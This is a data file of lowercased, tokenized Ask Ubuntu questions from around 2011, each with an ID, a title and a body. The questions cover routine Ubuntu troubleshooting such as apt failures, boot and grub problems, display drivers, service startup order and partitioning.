57857	is 97 processes on an apache2 server normal ?	i have 97 processing running , that 's what top reports . i only have the base install + apache2 and php5 . could it really add that much stuff ? or does the ubuntu-desktop have like 300 processes ? i am running it on an old g4 powerpc . uid pid ppid c stime tty time cmd root 1 0 0 13:35 ? 00:00:01 /sbin/init root 2 0 0 13:35 ? 00:00:00 [ kthreadd ] root 3 2 0 13:35 ? 00:00:00 [ ksoftirqd/0 ] root 4 2 0 13:35 ? 00:00:00 [ watchdog/0 ] root 5 2 0 13:35 ? 00:00:00 [ events/0 ] root 6 2 0 13:35 ? 00:00:00 [ cpuset ] root 7 2 0 13:35 ? 00:00:00 [ khelper ] root 8 2 0 13:35 ? 00:00:00 [ netns ] root 9 2 0 13:35 ? 00:00:00 [ async/mgr ] root 10 2 0 13:35 ? 00:00:00 [ pm ] root 11 2 0 13:35 ? 00:00:00 [ sync_supers ] root 12 2 0 13:35 ? 00:00:00 [ bdi-default ] root 13 2 0 13:35 ? 00:00:00 [ kintegrityd/0 ] root 14 2 0 13:35 ? 00:00:00 [ kblockd/0 ] root 15 2 0 13:35 ? 00:00:00 [ ata/0 ] root 16 2 0 13:35 ? 00:00:00 [ ata_aux ] root 17 2 0 13:35 ? 00:00:00 [ ksuspend_usbd ] root 18 2 0 13:35 ? 00:00:00 [ khubd ] root 19 2 0 13:35 ? 00:00:00 [ kseriod ] root 21 2 0 13:35 ? 00:00:00 [ khungtaskd ] root 22 2 0 13:35 ? 00:00:00 [ kswapd0 ] root 23 2 0 13:35 ? 00:00:00 [ ksmd ] root 24 2 0 13:35 ? 00:00:00 [ aio/0 ] root 25 2 0 13:35 ? 00:00:00 [ crypto/0 ] root 28 2 0 13:35 ? 00:00:00 [ khvcd ] root 30 2 0 13:35 ? 00:00:00 [ kondemand/0 ] root 31 2 0 13:35 ? 00:00:00 [ kconservative/0 ] root 196 2 0 13:35 ? 00:00:00 [ khpsbpkt ] root 197 2 0 13:35 ? 00:00:00 [ usbhid_resumer ] root 199 2 0 13:35 ? 00:00:00 [ knodemgrd_0 ] root 200 2 0 13:35 ? 00:00:00 [ jbd2/hda3-8 ] root 201 2 0 13:35 ? 00:00:00 [ ext4-dio-unwrit ] root 262 1 0 13:35 ? 00:00:00 upstart-udev-bridge -- daemon root 266 1 0 13:35 ? 00:00:00 udevd -- daemon root 278 2 0 13:35 ? 00:00:00 [ kapmd ] syslog 579 1 0 13:35 ? 00:00:00 rsyslogd -c4 104 586 1 0 13:35 ? 00:00:00 dbus-daemon -- system -- fork root 641 1 0 13:35 tty4 00:00:00 /sbin/getty -8 38400 tty4 root 645 1 0 13:35 tty5 00:00:00 /sbin/getty -8 38400 tty5 root 649 1 0 13:35 tty2 00:00:00 /sbin/getty -8 38400 tty2 root 650 1 0 13:35 tty3 00:00:00 /sbin/getty -8 38400 tty3 root 653 1 0 13:35 tty6 00:00:00 /sbin/getty -8 38400 tty6 daemon 669 1 0 13:35 ? 00:00:00 atd root 670 1 0 13:35 ? 00:00:00 cron bind 717 1 0 13:35 ? 00:00:00 /usr/sbin/named -u bind mysql 761 1 0 13:35 ? 00:00:03 /usr/sbin/mysqld root 774 1 0 13:35 ? 00:00:00 /usr/sbin/mouseemu root 776 774 0 13:35 ? 00:00:00 /usr/sbin/mouseemu nobody 830 1 0 13:35 ? 00:00:00 dnsmasq -- strict-order -- bind-interfaces -- pid-file=/var/run/libvirt/network/default.pid -- conf-file= -- listen-address 192.168.122.1 -- except-interface lo -- dhcp-range 192.168.122.2,192.168.122.254 -- dhcp-lease-max=253 root 880 1 0 13:35 tty1 00:00:00 /bin/login -- root 1899 1 0 13:36 ? 00:00:00 /usr/sbin/console-kit-daemon -- no-daemon alex 1971 880 0 13:36 tty1 00:00:01 -bash root 2031 1 0 13:36 ? 00:00:00 /usr/sbin/vsftpd root 2055 2 0 13:49 ? 00:00:00 [ flush-3:0 ] root 2130 1 0 13:55 ? 00:00:00 /usr/sbin/apache2 -k start www-data 2133 2130 0 13:55 ? 00:00:00 /usr/sbin/apache2 -k start www-data 2134 2130 0 13:55 ? 00:00:00 /usr/sbin/apache2 -k start www-data 2135 2130 0 13:55 ? 00:00:04 /usr/sbin/apache2 -k start www-data 2136 2130 0 13:55 ? 00:00:00 /usr/sbin/apache2 -k start www-data 2137 2130 0 13:55 ? 00:00:00 /usr/sbin/apache2 -k start root 2203 1 0 13:56 ? 00:00:00 dhclient3 -e if_metric=100 -pf /var/run/dhclient.eth0.pid -lf /var/lib/dhcp3/dhclient.eth0.leases eth0 root 2223 1 0 13:56 ? 00:00:00 /usr/sbin/sshd -d root 3083 266 0 13:58 ? 00:00:00 udevd -- daemon www-data 3202 2130 0 13:59 ? 00:00:00 /usr/sbin/apache2 -k start www-data 3203 2130 0 13:59 ? 00:00:00 /usr/sbin/apache2 -k start www-data 3204 2130 0 14:00 ? 00:00:00 /usr/sbin/apache2 -k start www-data 3205 2130 0 14:00 ? 00:00:00 /usr/sbin/apache2 -k start alex 3209 1971 0 14:05 tty1 00:00:00 ps -aef
57869	why is update manager getting stuck unless i hit 'q ' ?	when i try to install updates ( via either update manager or apt-get upgrade ) the usual apt upgrade process is stopped as it shows me some changelogs , for example : nothing will happen until i hit the q key , then it outputs : apt-listchanges : mailing root : apt-listchanges : changelogs for msg ( msg is my hostname ) and finishes installing the updates as usual . this does n't happen when installing a new package , only when installing updates . what is causing this ? how can i fix it ?
57872	i ca n't remove a package - what should i do ?	i 'm trying to remove libavcodec52 package but it wo n't work . if i try through software central it just tells me it did n't work and to check my internet conection . if i try it at the terminal , this is what i get souljacker ahab @ : ~ $ sudo apt-get remove libavcodec52 reading package lists ... ready building dependency tree reading state information ... ready the following packages were automatically installed and are no longer needed : libmodplug1 libtwolame0 libva-1-x11-libxcb libxcb-keysyms1 xv0 libcddb2 libass4 libdvbpsi6 libvlc5 libupnp3 libxcb-7-randr0 libiso9660 libkate1 vlc-data libtar libvlccore4 libvcdinfo0 libebml3 libmpcdec6 libmatroska3 libsdl-image1.2 liba52-0.7.4 use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libavcodec libavformat-extra-extra-52-52 libopenjpeg2 librtmp0 suggested packages : libfaad0 the following packages will be removed : libavcodec52 libavformat52 vlc vlc vlc-nox vlc-plugin-notify-plugin-pulse the following new packages will be installed : libavcodec libavformat-extra-extra-52-52 libopenjpeg2 librtmp0 0 upgraded , 4 newly installed , 6 to remove and 1 not upgraded . you must download kb/5.489 127 kb file . after this operation , 12.1mb disk space will be freed . do you want to continue [ y / n ] ? s err http : //br.archive.ubuntu.com/ubuntu/ natty / universe libopenjpeg2 i386 1.3 + dfsg-4 404 not found err http : //br.archive.ubuntu.com/ubuntu/ natty / universe librtmp0 i386 2.3-2 404 not found http : //br.archive.ubuntu.com/ubuntu/pool/universe/o/openjpeg/libopenjpeg2_1.3+dfsg-4_i386.deb failed to fetch 404 not found http : //br.archive.ubuntu.com/ubuntu/pool/universe/r/rtmpdump/librtmp0_2.3-2_i386.deb failed to fetch 404 not found e : unable to fetch some archives , maybe run apt-get update or try with - fix-missing ? i 've tried an apt-get update and nothing changes . any help ?
57874	stripping ubuntu 10.04 server down to jeos like setup ?	this question is cross posted from stack overflow : http : //stackoverflow.com/questions/7113768/stripping-ubuntu-10-04-server-down-to-jeos-like-setup i am setting up a web application to run on cloud servers that will be created and destroyed programmatically via a supplied api . for my purposes i want a stripped down version of ubuntu like jeos , to which i would be adding node.js and some node modules . the server company offers the ability to create custom system images by taking an image of a running server but my initial server needs to be booted with an image provided by them , in this case an ubuntu 10.04 lamp image . i would therefore need to strip out the unneeded packages . what is the safe way to accomplish this ? is there a list somewhere of what is included in jeos or something similar so i can determine what is unsafe to remove ? i want to note that i have read similar questions where uses are trying to strip the server down for performance reasons , where the key is minimizing the number of running processes and memory usage . in my situation i am looking to minimize the image size to reduce the time it takes to create a new server
57875	php5-fpm incomplete install - no config file	i 've set up a server with ubuntu 11.04 and nginx+php-fpm+varnish+apc+mysql+memcached+wordpress . everything runs pretty nice , but there is a tiny problem with the php-fpm service . install goes ok after the usual apt-get install php5-fpm but when you start the service , there is a problem with the config file . it seems that comes from the debian package , that uses certain directory ( /var/www ) that it is used there , but not by default in ubuntu . so each time i restart the service , i get this : # service php5-fpm start * starting php5 fpm ... aug 19 20:57:31.622788 [ warning ] [ pool www ] pm.start_servers is not set . it 's been set to 20 . ... done . it 's looking for a config file that i do n't have , or that i have but php5-fpm does n't find . how to solve the problem ? where do i have to put the right config file for php-fpm ? ?
57879	ctrl+c wo n't close man pages	i 'm setting up a linode server , and connecting to it via ssh with putty . when i bring up a man page , and do n't want to go through the whole thing , i 'm used to doing a ctrl+c on the unix boxes i 've worked with . this does n't do anything for me in this situation , and i end up having to close the window , and reconnect . is there a way to enable ctrl+c to work normally , or is there a different key sequence in ubuntu that will implement the break ?
57881	memory stick not formatting ?	i have a 8gb memory stick pro duo that is refusing to format or be read correctly . while deleting a file off of it from my playstation portable , the battery got accidentally knocked out . now , nothing is able to read it . i get this message when i try to format it : error creating file system : helper exited with exit code 1 : helper failed with : mkfs.vfat : failed whilst writing fat mkfs.vfat 3.0.9 ( 31 jan 2010 ) two methods for reading off the stick are by inserting it directly into the computer or by putting it in my playstation and connecting to it through a wire . when i use the latter method and attempt to open it , i can see a bunch of files with random symbols as names ( forum is n't allowing me to post a screenshot ) . anyone know how i can fix this ? be specific with instructions , especially ones that involve terminal because i am new to linux.thanks in advance .
57882	can not type after gnome login since last update	last time i let my ubuntu 11.04 to upgrade all its packages , i think a new kernel was also downloaded . since then keyboard stopped working so that i can press enter button on the login screen , but after i get the desktop ready i can not type . the kernel version is 2.6.38 but if i boot with 2.6.35 nothing changes . i can start ubuntu in recovery mode , keyboard is working there , but i do n't know what to do there . when i looked around the settings on a certain menu point ( input settings or kind of.. ) i got an error message that ibus daemon is not started . i was asked if i 'd like to start it , but after starting nothing got better . do you have any idea how could i get my keyboard working again.. ? update : after a recovery mode package update keyboard is working , but i have to press each button for about 1 second to see the letter on the screen , fast typing is impossible . key combinations , such as alt-shift-t are not working at all .
57885	iphone application does n't show individual songs correctly	i have 300 songs in ubuntu one . ubuntu one music for iphone , menu `` artists '' show the artists , but menu `` albums '' and `` songs '' do n't show the albums or tracks songs if i were not before show the albums or the tracks songs in the menu `` artists '' . for example , the menu `` settings '' show 266 artists , 12 albums and only 25 songs ! when i show album or a track in the menu `` artists '' , then this album and these tracks are in the menu `` songs '' , but not before .
57891	is there a site where one can poll ubuntu users ?	is there a place to poll ubuntu users other than www.ubuntuforums.org ? suppose for instance one wants to ask subjective questions like : which media player do you use ? or are you satisfied with ubuntu on the latest dell notebook ? etc . etc .
57892	how do i ignore a conflicting package on a regex match in apt-get ?	i 'm trying to install all but one of the r packages which are currently in the ubuntu repositories : however , when i go to do so sudo apt-get install 'r-cran-* ' i get an error : some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : r-cran-mass : conflicts : r-cran-vr ok , so i want to ignore this conflict . how ? i see the flag -- ignore-missing , but this is a conflict ? i do n't see any options to -- ignore-conflicted ? ? computer : ~ > sudo apt-get install 'r-cran-* ' -- ignore-conflict e : command line option -- ignore-conflict is not understood computer : ~ > sudo apt-get install 'r-cran-* ' -- ignore-conflicted e : command line option -- ignore-conflicted is not understood
57899	how can i change the order of cycling windows in unity launcher ?	when there are multiple instances of the same application running , each with its own window , the unity launcher shows one icon for all of them . then you have to click on that icon to go the `` first '' of those windows and click again to choose any other . so far so good . what is annoying to me is that this `` first '' window is not the last that i 've been working with . so i have to bring up the entire list again and click on the desired one . this is particularly disturbing when you are switching back and forth between two specific windows and have others that are not as frequently used . is there a way to adjust the behavior to what i like ? i appreciate any hint .
57908	how can i quickly copy a gpt partition scheme from one hard drive to another ?	on a non gpt partition table i can do sfdisk -d /dev/sda | sfdisk /dev/sdb . but sfdisk does n't support gpt partition tables . what can i use instead ? i 'm looking for a one or two command solution , not just using gnu parted to output the partition sizes and then manually making them again .
57909	how do you get a list of all starting services ?	i know about the update-rc.d service options command to add and remove services from startup , but how do i use it to get a list of all the services that are currently configured to start at startup ? is there some other way to get this list ?
57914	how can i put a `` lock sreen '' icon on the launcher ?	at first i apologize if the subject was in the wrong place the reason is that i do not speak english and enlisted google to translate can i register and add this topic i have a question : i use ubuntu 11.04 and i want to put lock screen icon in launcher :
57915	environment variables when run with 'sudo '	as example to my question , my ~/.bashrc file contains this lines : > export ld_library_path=/opt/intel/mkl/lib/ia32 : $ ld_library_path > export ld_preload=/opt/intel/mkl/lib/ia32/libmkl_core.so so that numpy ( python ) could find libraries that it needs to run , as it 's build with mkl and intel compilers . this workflow is n't the best , but that 's another story . my question is how can i pass arbitrary variables ( like those in ~/.bashrc ) when i run program with 'sudo ' ( but not root ) ? currently , if i run : sudo python -c `` import numpy '' i get an error : importerror : libimf.so : can not open shared object file : no such file or directory* some suggestions as sudo -i or sudo -e does not change anything here . edit : i ca n't answer my question ( not enough points : d ) but i 'll comment here , in a hope that there are other linux newbies wondering about sudo traps . [ only temporarily ! ] this works for me ( ~/.bashrc ) : alias sudo='sudo env path= $ path var1=some_value var2=some_value ... '
57919	how to open all video files with vlc	i 'm using vlc , which can open all kinds of files without problem , but how can i associate all video files ( avi , mpg , wmv , flv , etc . ) to be opened with vlc by default ?
57926	why are the *.04 releases supported for three years and the *.10 releases are n't ?	i 've been wondering why canonical releases a *.04 release ( ubuntu ) , advertises that it is supported for three years , and then a *.10 release comes out and is n't supported for three years . my question : what 's different about the *.10 release ?
57929	ubuntu detects another monitor when i do n't have any other monitor	ubuntu detects a dvi monitor even if i do n't have any . i only have a vga monitor plugged . this is a problem because the game i play crashes when i have two monitors . but i only have one monitor plugged in . this only applies to ubuntu 11.04 , and linux distros with the latest linux kernel for some reason . the graphics card i 'm using is intel 's gma 3150 . it 's the same graphics card used in some netbooks . but i have on a desktop . so , how can i make ubuntu not detect it . i mean like get rid of it , not just turning off the monitor through the monitor preferences .
57930	how to make the vsftpd not to start automatically ?	how to make the vsftpd not to start automatically when starting the machine ?
57933	ca n't set resolution to 1600x1200 on a dell 2001fp monitor	i 'm running ubuntu 10.10 and a geforce 8400 gs gpu with the nvidia package . my monitor is a dell 2001fp and lists its native resolution as 1600 * 1200 . i can only achieve 1152 * 864 . same issue with fedora . in win xp/vista the resolution is achieved . i 've unsuccessfully edited the xorg.conf in the past with details that seem appropriate for the monitor and have had little results . any suggestions ? granted this is pretty old hardware and i 'm doubtful others will still be using a similar set-up .
57936	check if users are logged in , check condition , shutdown automatically at set time	first the situation : i have a server that i want to shutdown automatically at night ( 00:00 ) , but i need to make sure no one is logged via ssh in still . if they are , then i will allow up to another hour for a second shutdown attempt ( 01:00 ) at which time the server goes down no matter what . i figure i can just go with a cron job for shutdown ( unless there 's a better way to schedule shutdowns ) , but would n't know how to implement the check in the first case . extra : is there a way to know if a user is actively using his samba share , and in this case , not complete the shutdown procedure . or better yet , check if there is a healthy amount of disk i/o that will also not complete the shutdown . i have seen some answers already that can help me out , so i wish to know specifically , what would be the best way to accomplish this as a whole , without hacking up different bits and pieces .
57937	how can i roll back a kernel update ?	an update for ubuntu was available today and it installed the generic kernel 2.6.38.11.26 . after doing so networking is no longer functioning correctly . my acer aspire 4520 has an nvidia network card and an atheros wireless chipset which was functioning properly before the update . now when i boot neither are functioning properly . wireless networking is still a selectable option but even when enabled the options for selecting a network is grayed out . the ethernet connection will activate but only after about 3-5 minutes after booting to the desktop . how can i fix this or roll back to the previous kernel ? this is a serious bug and i 'm fairly certain i 'm not the only one with this issue .
57943	does an lts desktop get any updates after three years ?	in cleaning up an answer today , i noted the following : lts desktops get updates for three years lts servers get updates for five years an ubuntu desktop is ( essentially ) a superset of server packages . so in the fourth and fifth year , if lts server gets kernel updates* , are these also provided for lts desktop ? what about other core-system stuff ? i realise the kernel is a little special because there is a -server variant but are updates pushed for -generic ( et al ) too ?
57949	what do i do once a branch is marked as 'needs fixing '	i have a branch to be merged here : https : //code.launchpad.net/~headbangerkenny/ubuntuone-android-music/branch/+merge/71364 i got told what i needed to fix and did that , do i need to set anything else ? i ca n't find any kind of help on help.launchpad.net so i 'm stuck ( it 's probably something really really silly , but ya know ! )
57956	how do i get started writing an applet for the panel ?	currently i am personalizing my ubuntu installation and i want to write a small applet to add it in the top left corner of the screen . this should be a `` main menu '' like in mac os x where i have a menu that opens when i click the ( apple/ '' tux '' ) logo and offers me to run the updater , the software center , etc . with this i could combine this applet with my global menu i already have activated to achieve a mac-like menu interface . : - ) which tools and programming languages are used to write such applets and what is the first place i should look for such information ?
57960	how can i replace the couchdb server for ubuntu one ?	i 'm writing some applications and tools that are meant to make use of ubuntu one , but since the couchdb sync service has been down for months , i have n't been able to test it or demonstrate how it will work in practice . this is very limiting to me , so i would like to setup a temporary couchdb service to replace ubuntu ones own . but how do i do it ? obviously , if i just add an entry to /etc/hosts for couchdb.one.ubuntu.com , then i can make things connect to my service . but the user needs to be able to login etc . how do i accomplish those things ? is there anything special about the couchdb ubuntu one uses ?
57962	after boot , need to restart smbd to get printer sharing to work . is it starting before cups ?	as the title says , after i reboot i need to restart smbd to get printers to show up over smb . my thought was that maybe smbd is set to start before cups and gets messed up ? this is with 11.04 , how i do i check the startup order of startup dependencies ? thanks ,
57963	18 billion gb extended partition showing in gparted - how was this done ?	and what does it mean - exactly ? and - although i strongly suspect it 's not the drive 's fault and also that there is n't one - anyone know how to return drives to their original geometric state after they 've been silently corrupted ?
57966	do we have a borderless theme for gnome 3 ?	do we have any aqua like borderless themes for gnome 3 ? ? when i say aqua like i do n't mean the whole traffic light buttons and stuff like mac4linux , rather a theme with 0px borders and larger window shadows .
57967	rectangles instead of text	i have this problem : i see rectangles in the places where should be text . this happens , for example in code : :blocks in the build log tab , in the warning lines , the rest of the text is ok . this also happens in certain message boxes of ubuntu . and in the subtitles text in the default video player , some lines , not all . here is an image of the rects :
57969	can someone explain what these messages are really telling me ?	trying to log back in , init greets with messages like failed to spawn encryptfs-utils-save ( i do n't care for encryption and my drives are never encrypted ... .at least , not by me - so who or what is encrypting [ or trying to ] and how can i stop this unathorised encrypting occurring on my hard drives ? ) . failed to spawn plymouth-upstart-bridge main process - unable to execute - no such file or directory 5 virtual terminals i was n't aware of ( at the time ) killed as well . perhaps a good thing ? irqbalance main process killed ( is n't that for raid ? i have no need for virtualisation and hold raid in mild contempt for it 's monumental security exploitabilities ) modem-manager [ 993 ] - caught signal 15 , shutting down ... ( seriously ? i 'm assuming that has nothing to do with my pppoe connection , does it ? ) dbus main process ( 856 ) killed - ( i 'm a little hazy on the dbus - and suspicious of what it 's primarily used for - at least , on my machines which are full of perl and python and ruby and endless catastrophic system failures ) can anyone shed some light on any of these , or - if i 'm lucky - all of them ?
57977	what should i consider when moving from gnome to xfce ?	as ubuntu and gnome gets modernized , xfce begins to look like a natural replacement for the `` conservative gnome '' that many are used to . and even if the modern desktops are nice , some people will prefer the old ways . but can you simply switch from gnome 2 to xfce4 or are there things to consider ? i am asking this as a single question , but it can obviously be broken down into many : can i still use the app-indicators that i 'm used to ? can i still use gnome panel applets ? is it possible to use compiz with the plugins i 've been using ? can i use custom launchers and docks like i can in gnome 2 ? can i use the same themes , icons , etc ? is it ok to just install xubuntu-desktop on my ubuntu install , or should i install xubuntu from scratch ? since i have n't done this , i do n't know what questions to ask . so even if i have n't asked them , please do answer them if there are important things to consider .
57981	command line archive manager / extracter	i keep forgetting all the corresponding extract commands for every compression format . so i was thinking about writing a script that merely maps file extensions to the appropriate extract command . but i guess something like this already exists , i just ca n't find it . i would be happy with something like file-roller , but file-roller is a gui tool .
57989	upgrading to 10.04 broke my truemobile 1150 wireless	my laptop was running 8.04 lts ( hardy ) , using network manager i believe , and the wireless worked fine . i do not believe i was using ndiswrapper , as the original version of ubuntu i installed ( edgy ) just auto-detected everything . i did an upgrade to 10.04.3 lts ( lucid ) and when i rebooted wireless networking stopped working . i ca n't even get it to connect to open wi-fi . $ iwconfig eth1 eth1 ieee 802.11b essid : '' myessid '' mode : managed frequency:2.457 ghz access point : none bit rate:11 mb/s sensitivity:1/0 retry limit:8 rts thr : off fragment thr : off power management : off link quality=0/70 signal level=-122 dbm noise level=-122 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 lshw -c network output : *-network description : truemobile 1150 series pc card product : version 01.01 vendor : dell physical id : 0 slot : socket 1 resources : irq:5 *-network description : wireless interface physical id : 2 logical name : eth1 capabilities : ethernet physical wireless configuration : broadcast=yes driver=orinoco driverversion=0.15 firmware=lucent/agere 9.48 link=no multicast=yes wireless=ieee 802.11b $ rfkill list all 0 : phy0 : wireless lan soft blocked : no hard blocked : no $ pccardctl ident 1 product info : `` dell '' , `` truemobile 1150 series pc card '' , `` version 01.01 '' , `` '' manfid : 0x0156 , 0x0002 function : 6 ( network )
57990	set a specific theme for root launched applications	i would like the the applications i launch as root to look differently from the application launched as a normal user . this can be done by using a theme that does not come from usr/share/themes but i have n't found a way to modify the default theme the root applications use . can this be done ? using sudo gnome-appearance-properties doesnât work .
57991	is there any way i can setup airport express from ubuntu ?	offical source says it 's not possible and also could n't find anything more about setting it up apart from os x or windows manuals .
57994	root drive is running out of disk space . how can i free up space ?	i 'm using ubuntu 11.04 and i want to free up some space in my root directory , which is overloaded . i especially want to change the path used for installing applications ( they are getting installed directly to the root drive ) . another consideration is that i 'm working on a mysql database server . the server is installed in the root directory itself , so i do n't want to risk losing any data . please give me some tips to help sort out this problem .
57995	can cd-rws and dvd+/-rws be mounted rw ?	@ enzotib mentioned the following command sudo mount -o remount , rw /cdrom does this imply i can mount a cd or dvd in rw mode and use like a ( real ) filesystem ? does this work with the popular iso-9660 filesystem , which is read-only by design ? will this create a multsession cd with one session per change ( or per mount ) ? would this work ( differently ) on a iso image file on a read/write filesystem ?
57997	wo n't boot if usb stuff is plugged in ?	edit : it fixed itself , but i have no idea how ... i have a new laptop running ubuntu 11.04 . if i have certain usb devices ( a wireless mouse , or my camera , but not a usb flash drive ) plugged in to any of the computer 's usb ports , ubuntu wo n't boot . ( they work fine as long as i plug them in once i can see an ubuntu splash screen . ) it gets to grub , and if i run in recovery mode , it starts booting , then freezes at about 2 seconds , and goes to a black screen . ( without recovery mode , it just does the black screen . ) ctrl+alt+f1 does nothing ; i also ca n't ssh into it at this point . removing kernel options quiet splash from grub did nothing except give a `` loading , please wait ... '' message with the usb not plugged in ; the same for replacing them with noapic . my bios has no `` legacy usb '' option that i can find . nothing i can find in /var/log is updated when this happens , so i have no logs . any ideas ?
57998	screen intensity before and after inactivity	on my thinkpad w520 laptop , after a short period of inactivity ( eg . no mouse movement ) on battery , the screen dims for power saving . when i move the mouse ( ie . , the screen lights back up , but not at the same level ( darker ) than it was before . i 've seen some code a while ago with x managing the dimness ( ? ) but ca n't remember where it was . maybe i can configure something in x or somehow do something with it ? who is responsible for lighting the screen up when the mouse moves ? how do i make it go back to its original setting when it becomes active again ?
58001	how do you make the contents of isos mounted by the archive mounter executable ?	the archive mounter feature in recent ubuntu editions is great : you just use it on any *.iso file and it mounts it as if you 'd put a cd in the drive ... well , almost . if you want to just read the data , it 's great , but if you want to actually execute any programs on it ( for instance , to run an old game in wine ) , you get an error : the file '/home/ { myname } /.gvfs/ { myisofile } / { myexecutable } .exe ' is not marked as executable . if this was downloaded or copied from an untrusted source , it may be dangerous to run . for more details , read about the executable bit . if you try use the gnome properties dialog 's permissions tab , it tells you : the permissions of `` /home/ { myname } /.gvfs/ { myisofile } / { myexecutable } .exe '' could not be determined . and if you try to sudo chmod a+x that path , you get : chmod : can not access `/home/ { myname } /.gvfs/ { myisofile } / { myexecutable } .exe ' : permission denied so , my question is ... does anyone know how to get isos mounted ( through the archive mounter ) and still be able to execute their contents ?
58002	how do i enable compiz in xubuntu ?	i would like to use compiz in xubuntu ( under xfce obviously ) . i have seen this tutorial : http : //www.ghacks.net/2010/07/11/run-compiz-with-xfce4/ firstly , this did n't work well for me , because when trying compiz âreplace ccp & in a terminal , it tells me there is no plugin such as cpp , and the window decorations are lost right away . is there a reliable way to run compiz with xfce , please ? i miss my desktop cube . update thanks for the answers so far . just running compiz -- replace still causes the complete loss of window decorations . also , i tried fossfreedom 's suggestion , and then i get the output below . i installed emerald initially because it was complaining about not finding it , but i think i had the segfault even without emerald . ( some other output ) ... /usr/bin/emerald : screen 0 on display `` :0.0 '' already has a decoration manager ; try using the -- replace option to replace the current decoration manager . segmentation fault setting update `` command '' update 2 well , turns out that just trying to run emerald by itself ends with a segfault , and apparently this is a known bug . used the solution here to resolve that problem : http : //www.webupd8.org/2011/05/get-emerald-to-work-in-ubuntu-1104.html still , i was n't actually hoping to use emerald , but what the heck .
58007	view images fit to width in image viewer	how can i make the image viewer fit all images to width ?
58009	light easy to use presentation software	i am looking for an easy to use light presentation software . the main features i need are : light ( on dependencies and resource consumption ) easy to use align & distribute information on slide use pictures offline editor the extra features i would like are : on click animations .ppt import/export use templates/themes for easily unified presentation sliderocket looks like a presentation tool matching my needs . unfortunately it is an online presentation editor and i am looking for an offline one . i do n't mind the software being proprietary and for-pay
58010	where is the bookmarks toolbar icon located ?	where is the bookmarks icon file located for firefox 9.0a1 in ubuntu 10.04 ? i want to change it to the default humanity bookmarks icon . doing locate bookmarks and locate bookmarks.png has turned up no useful results . here is the icon that i 'm looking for to change . i just need to know the path to it :
58015	how to install 11.04 on a different partition ?	i have windows 7 installed . the hard disk is composed of c : for windows 7 , d : recovery ; e : hp tools . i want to install ubuntu on a different partition to be safe in case i need to remove either windows or ubuntu without any problems . another question : does the dual boot using automatic partition by ubuntu to solve my problem ?
58016	`` failed to set displayport power '' - dual head freezes os	problem no picture appears on the second , externally , connected monitor . all used to work perfectly until a week ago or so . i always used nvidia-settings + twinview/clone to clone my laptops view , but now nothing happens and ubuntu freezes , gets garbled and unresponsive when i try to clone it . 50 usd bounty is promised to whoever drops the magic words that will fix this for me , granted you accept paypal . i rely on dual-screen setup on this machine for my work and really need it to work路 screenshots these show some of the settings in nvidia-settings and also how garbled the screen becomes . notice that the external screen ( in this case the samsung ) shows nothing and is just black all the time . it does however detect it has an attached cable to it since the monitor says `` no signal '' when i disconnect the cable from my laptop to it . symptoms external monitors are always detected properly , problem occurs when i try to actually activate them . upon activation in nvidia-settings ( or anything else ) the system freezes . a garbled picture is shown on the laptop screen and no picture is shown on external monitor . hardware macbook air 3,2 geforce 320m ( gpu 0 ) software nvidia driver version : 270.41.06 , also am trying 280.13 ( neither solves the problem ) ubuntu 11.04 ( 64 ) xorg log lives here : http : //chaosrealm.net/wtactics/files/xorg.0.log.txt already tried 14th of august 2011 : list item reinstalled the nvidia drivers and using the ones ubuntu chooses in restricted drivers box . reinstalled xorg . deleted all gnome2 settings and got a fresh gnome2 . connected the computer to several different external monitors , all which used to work , but with same zero result . ( this all works in another os on the same computer , so it 's not hardware issues . ) shut off compiz - no change . 20th of august 2011 : reinstalled ubuntu-desktop and all dependencies for it , i see no change . installed latest nvidia prop dirvers 280.13 . status quo . tried creating new user accounts and testing other already existing accounts : same result . tried disper & xrandr same freeze occurs . 21th of august 2011 : completely re-installed the whole os , but this time i went with linuxmint 11 ( katya , 64 ) . the problem remains .
58023	how can i make lightdm the default display manager ?	i have lightdm installed and can start it with sudo start lightdm . but at boot , gdm is still the default . how can change this so lightdm is loaded automatically at boot instead of gdm ?
58027	automatically add/scan existing cover art in banshee ?	i built my banshee db from scratch and am now facing the issue , that none of my albums shows cover art unless i start playing one of its songs . all the album folders contain a cover file cover.jpg and i do n't want anything to be downloaded from the internet . i guess one workaround would be to play one song from each album for one second and then skip to the next via the remote control functionality of banshee but that seems rather cumbersome . is there already a way to trigger this cover art scan from within banshee ?
58030	hibernate option in login screen menu ?	how can i add a hibernate option to the gdm 3 menu ? i only have suspend there but i need hibernation as it does not eat the battery . ( just to make sure - i am talking about the menu in the greeter , not in the gnome-shell itself - the system is multi-user and every user is supposed to switch to greeter and hibernate when done ) . the hibernation itself is working just fine ( from gnome shell menu or command line ) , just no option in gdm . alternatively , custom keyboard shortcuts working under gdm would do the trick as well .
58032	dhcp-server does n't start at boot because of wrong startup order	apparently the isc-dhcp-server is started too early in the boot sequence , it states that it has nothing to do . if i just log directly in as root and start it using the init.d-script , it starts normally . my setup is basically an utterly standard router , with an eth0 on the inet side , and an eth1 on the lan side . however , i 've defined a bridge instead of the eth1 for the lan-side . thus , the lan-part of the network is n't up until the bridge is up . i currently believe that the dhcp server is brought up before the bridge is brought up , probably because the bridge is brought up with the 'networking ' task , while the eth 's are taken up with the 'network-interface ' tasks - which are run earlier . ( also , the bridge takes a small age to get up compared to the eth 's ) . if i do take away the bridge config , instead using eth1 directly for the lan side , things work . ( however , judging by syslog , things are still tight . ) ideas of how the get dhcp to start later ? ( the reason for the bridge , is to be able to use kvm with bridged networking.. )
58033	cryptsetup warning	i was installing xfce under gnome in terminal and everything seems to have worked , but terminal displayed these two messages just before the install finished . cryptsetup : warning : failed to detect canonical device of /dev/sda1 cryptsetup : warning : could not determine root device from /etc/fstab nothing seems to be affected on gnome and the xfce session boots fine . should i be worried ?
58034	how do i fix grub so that it shows up during boot ?	i installed ubuntu alongside windows but grub wont show during boot and windows starts instead . i used a livecd and followed these instructions https : //help.ubuntu.com/community/boot-repair but they did n't help . so here is the boot info summary http : //paste.ubuntu.com/671345/ if more info is necessary do n't hesitate to ask . thanks august 22 edit : i use the standard windows 7 bootloader ... windows came preinstalled on the desktop . i have yet to successfully boot into ubuntu on this machine . with the exception of live cd .
